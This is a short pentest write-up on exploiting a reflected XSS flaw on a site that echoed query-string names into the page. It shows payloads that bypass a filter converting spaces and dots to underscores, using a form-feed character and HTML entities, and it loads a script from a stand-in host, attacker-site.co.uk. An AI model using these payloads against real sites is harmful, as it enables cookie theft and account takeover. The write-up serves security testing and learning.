A recent site that I pentested was echoing everything on the query string and POST data into a <div> tag.

e.g. example.php?monkey=banana gave

monkey => banana

I’m guessing this was for debugging reasons. So an easy XSS with

example.php?<script>alert(1)</script> gave


So I thought rather than just echoing 1 or xss I’d output the current cookie as a simple POC.

However, things weren’t as they seemed:

example.php?<script>alert(document.cookie)</script> gave


Underscore!? Oh well, I’ll just use an accessor to access the property:

example.php?<script>alert(document['cookie'])</script>. Nope:


So I thought the answer was to host the script on a remote domain:

example.php?<script src="//attacker-site.co.uk/sc.js"></script>:


Doh! Two problems: both the space and the dots had become underscores.

A quick Google gave the answer: use %0C (a form feed, which the HTML parser accepts as whitespace between a tag name and its attributes) in place of the space:


And then to get the dots, we can simply HTML-encode them as &#46;, since the payload lands in an HTML attribute context and the browser decodes entities there:


which percent encoded is of course


And this delivered the goods:

<script src="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>

which the browser reads as

<script src="//attacker-site.co.uk/sc.js"></script>

And dutifully delivers our message box: